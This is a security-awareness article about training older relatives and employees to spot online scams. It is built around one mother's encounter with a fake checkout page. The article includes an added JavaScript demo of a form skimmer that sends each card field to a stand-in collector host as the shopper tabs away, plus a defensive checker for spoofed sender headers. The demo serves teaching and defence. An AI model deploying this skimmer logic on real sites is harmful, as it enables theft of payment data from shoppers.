Security awareness: Training moms and end users to spot a scam

Why awareness training is important for securing the enterprise and your extended network of friends and family.

Char Yarema is of the generation of parents who did not grow up using technology, so her son, Jonathan Yarema, security consultant at Trustwave, has impressed upon her the importance of using caution and patience when surfing the web. Jon wrote about his mom’s experience in his SpiderLabs blog post, and I had the chance to talk with the security duo to learn more about their story.

Char reminded me a lot of my own parents, who love the convenience and expansiveness of using the Internet but also fail to understand the potential threats that constantly lurk behind a computer screen. Just a few weeks ago, I received what was clearly a spam mail from my father. I called him to let him know that his email had likely been compromised as I had received said email with a subject that my dad would never have written. “What did the email say?” he asked.

I explained that I didn’t open it and that he needed to change his password immediately and the passwords of all other online accounts.

My dad is a retired general contractor, 69 years old, and for him the Internet has always been a source of entertainment. Like many folks his age, he doesn’t understand the criminal activity that he can easily fall victim to, most likely because he’s never been trained to look for suspicious behavior.

Char Yarema has, though. Before Christmas she had called up a store to place an order and learned that the free shipping was only available to online shoppers. “I called because I like to talk to someone. I knew that it said free shipping online, but with the gal it was $12. She explained that it was only free online, so I went back to the computer,” Yarema said.

It was her first online shopping experience and she navigated through the process with relative ease, clicking the item she wanted and arriving at the point where the site asked for her name and all the vital information. “I entered all of the information, and the next step was to place the order, but I heard this inner voice—probably Jon’s voice—saying ‘check for the lock’” said Yarema. She didn’t see it and wasn’t sure if it should have shown up before this point in her checkout, so she decided to call her son.

“I said, just wait and talk to Jon because I didn’t know if it was only the lock I should be looking for. I texted him, and he said not to do anything right now and that he’d check it out when he got to work,” Yarema said.

“Well, I got a message from him, he was practically shouting at me in capital letters—DO NOT PLACE THAT ORDER,” Yarema said. Unfortunately, the scam was sophisticated enough that the page captured each field as she moved on to the next one, so the attackers already had everything she had typed even though she never hit the submit button.
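The mechanism the article describes, a form that leaks field values as the shopper tabs from one box to the next, is easy to demonstrate. The block below is an added example and not the scam site's code: it installs a "blur" listener on each field that ships the value to a collector the moment focus leaves the box, and it runs under Node against a tiny stand-in for the browser DOM and network. The checkout origin, the collector URL, the field names and the typed values are all constructed for the example.

```javascript
// Added example (not the scam site's code): a field-level form skimmer plus a
// stand-in DOM and network so it runs under Node without a browser.
// PAGE_ORIGIN, COLLECTOR and the typed values below are constructed.

const PAGE_ORIGIN = "https://shop.example";            // assumed checkout origin
const COLLECTOR = "https://collector.example/drop";    // assumed attacker endpoint

// Minimal stand-in for an <input>: a value plus addEventListener/dispatch.
class FakeInput {
  constructor(name) { this.name = name; this.value = ""; this.listeners = {}; }
  addEventListener(type, fn) {
    (this.listeners[type] = this.listeners[type] || []).push(fn);
  }
  dispatch(type) { for (const fn of this.listeners[type] || []) fn({ target: this }); }
}

// Records outbound requests instead of sending them (stand-in for fetch/sendBeacon).
class FakeNetwork {
  constructor() { this.requests = []; }
  send(url, body) { this.requests.push({ url, body }); }
}

// The skimmer: every time focus leaves a field, ship that field's value.
// In a real page this is el.addEventListener("blur", ...) plus navigator.sendBeacon.
function installSkimmer(inputs, net) {
  for (const el of inputs) {
    el.addEventListener("blur", (e) => {
      net.send(COLLECTOR, JSON.stringify({ field: e.target.name, value: e.target.value }));
    });
  }
}

// A shopper fills in each field and tabs to the next; "Place order" is never clicked.
// Returns the number of requests that left the page during the session.
function simulateCheckout(net) {
  const inputs = ["name", "card_number", "cvv"].map((n) => new FakeInput(n));
  installSkimmer(inputs, net);
  const typed = { name: "J. Shopper", card_number: "4111111111111111", cvv: "123" }; // constructed
  for (const el of inputs) { el.value = typed[el.name]; el.dispatch("blur"); }
  return net.requests.length;
}

// Defender's view: every request that went to a different origin than the page
// before any submit happened.
function crossOriginLeaks(net) {
  return net.requests.filter((r) => new URL(r.url).origin !== PAGE_ORIGIN);
}

// Stand-alone run: prints one leaked field per line.
const demoNet = new FakeNetwork();
simulateCheckout(demoNet);
for (const leak of crossOriginLeaks(demoNet)) {
  console.log("left the page before submit:", leak.url, leak.body);
}
```

The point for training is that "I never clicked submit" is not a safety boundary: in a real browser the Network panel of the developer tools shows these requests firing on every tab-out. On the site-owner side, a Content-Security-Policy `connect-src` limited to the site's own origins blocks `fetch`, XHR and `sendBeacon` to a foreign collector, but that is a control the shopper cannot apply from their end.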

Because today’s workforce ranges from recent college graduates to the soon-to-be-retired, the average enterprise will have end users who are much like my dad and Jon’s mom. “We enjoy the technology but it’s kind of a love-hate relationship. Having a computer at home is like having a library in your dining room, but sometimes it scares me. Yet, it’s such a great invention that I’m drawn back into it.”

So for anyone entering the information security or cyber security industry: understanding who your end users are, and how comfortable and threat-aware they actually are, will determine the kind of training program you need to implement to defend your extended network.

Jonathan Yarema said, “One of the things that we’ve always looked at is certificates when you’re using a web browser. If you get that untrusted web sign, don’t go any further. Bring that to an administrator.”

Other topics you want to emphasize when training employees in cyber hygiene include password complexity and where passwords are stored, spam attacks, and spear phishing. Jonathan Yarema said, “Email comes through and it looks like it’s from someone else in the organization. Knowing what the roles are and who the players are is key, especially for new people. Sometimes security is just starting to see the attack vectors.”
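The spear-phishing case Yarema describes, mail that "looks like it's from someone else in the organization", usually works by putting a colleague's name in the display name while the actual address, or the Reply-To, points somewhere else. The check below is an added example, not a tool from the article or from Trustwave: it parses a From: header, compares the display name against a staff directory and flags the mismatches a new employee would not spot by eye. The organisation domain, the directory and the sample headers are constructed for the example.

```javascript
// Added example (not from the article): flag mail whose display name matches a
// colleague but whose address or Reply-To is not what the directory says.
// ORG_DOMAIN, DIRECTORY and SAMPLES are constructed for this example.

const ORG_DOMAIN = "example.com";                        // assumed organisation domain
const DIRECTORY = new Map([                               // constructed staff directory
  ["Jane Doe", "jane.doe@example.com"],
  ["Pat Finance", "pat.finance@example.com"],
]);

// Parses `Display Name <addr>`, `"Display Name" <addr>` or a bare address.
function parseFrom(headerValue) {
  const m = /^\s*(?:"?([^"<]*?)"?\s*)?<([^>]+)>\s*$/.exec(headerValue);
  if (m) return { name: (m[1] || "").trim(), address: m[2].trim().toLowerCase() };
  return { name: "", address: headerValue.trim().toLowerCase() };
}

// Case-, punctuation- and spacing-insensitive name comparison.
function normalizeName(name) {
  return name.toLowerCase().replace(/[^a-z ]/g, "").replace(/\s+/g, " ").trim();
}

function domainOf(address) {
  return address.split("@")[1] || "";
}

// Returns the reasons a message looks like a spoofed colleague; empty if none.
function spoofIndicators(fromHeader, replyToHeader) {
  const from = parseFrom(fromHeader);
  const reasons = [];
  const external = domainOf(from.address) !== ORG_DOMAIN;
  const known = [...DIRECTORY.keys()].find(
    (n) => normalizeName(n) === normalizeName(from.name)
  );

  // A colleague's name on an outside address is the classic display-name spoof.
  if (known && external) {
    reasons.push(`display name "${from.name}" is a colleague but address is ${from.address}`);
  }
  // Same name, internal domain, but not the mailbox the directory knows.
  if (known && !external && DIRECTORY.get(known) !== from.address) {
    reasons.push(`address ${from.address} does not match directory entry for ${known}`);
  }
  // A Reply-To that silently redirects the conversation outside the organisation.
  if (replyToHeader) {
    const rt = parseFrom(replyToHeader);
    if (rt.address !== from.address && domainOf(rt.address) !== ORG_DOMAIN) {
      reasons.push(`Reply-To ${rt.address} sends replies outside ${ORG_DOMAIN}`);
    }
  }
  return reasons;
}

// Constructed sample headers: one clean, three suspicious in different ways.
const SAMPLES = [
  { from: '"Jane Doe" <jane.doe@example.com>', replyTo: "" },
  { from: '"Jane Doe" <jane.doe@gmail.example>', replyTo: "" },
  { from: "Pat Finance <pat.finance@example.com>", replyTo: "ceo-urgent@example-payments.net" },
  { from: "Jane Doe <j.doe@example.com>", replyTo: "" },
];

// Runs the check over a batch and returns the verdict for each message.
function triage(samples = SAMPLES) {
  return samples.map((s) => ({ from: s.from, reasons: spoofIndicators(s.from, s.replyTo) }));
}

// Stand-alone run
for (const v of triage()) {
  console.log(v.reasons.length ? "SUSPECT" : "ok     ", v.from, v.reasons.join("; "));
}
```

A check like this belongs in the mail gateway or a transport rule rather than in the user's head, but it is also a good training aid: showing staff the raw From: and Reply-To values for the flagged samples teaches the habit of looking past the display name.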

Whether training employees, family, or friends about cyber security, Jonathan Yarema said, “Under normal circumstances you should see a certificate,” and, in dealing with any person, “You should never be asked for a password.” Ensuring that your employees keep these tips in mind will help to protect the enterprise.

This article is published as part of the IDG Contributor Network.

Tags: security, security awareness, CSO Australia, social engineering

Stories by Kacy Zurkus
